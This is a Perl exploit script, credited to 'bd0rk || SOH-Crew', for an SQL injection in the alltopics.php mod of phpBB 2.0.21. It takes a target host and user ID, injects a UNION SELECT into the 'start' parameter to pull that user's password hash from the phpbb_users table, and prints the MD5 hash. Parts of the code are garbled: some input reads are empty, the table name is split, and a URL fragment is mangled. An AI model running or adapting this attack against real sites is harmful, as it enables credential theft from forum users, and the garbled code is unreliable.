#!/usr/bin/perl print q{ ++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + phpBB 2.0.21 (alltopics.php) SQL Injection Exploit + + + + bd0rk || SOH-Crew + + + + Mod: [url="http://www.phpbbhacks.com/download/2821 wrote:[/b] http://www.phpbbhacks.com/download/2821[/url] + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++ }; use IO::Socket; print q{ => Insert URL => without ( http ) => }; $server = ; chop ($server); print q{ => Insert directory => es: /forum/ - /phpBB2/ => }; $dir = ; chop ($dir); print q{ => User ID => Number: => }; $user = ; chop ($user); if (!$ARGV[2]) { } $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ; print " => Exploit in process...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "Exploit failed"; print "Exploit\r\n"; print "in process...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "Exploit finished!\r\n\r\n"; while ($answer = <socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "MD5-Hash is: ".$1."\r\n"; } exit(); } }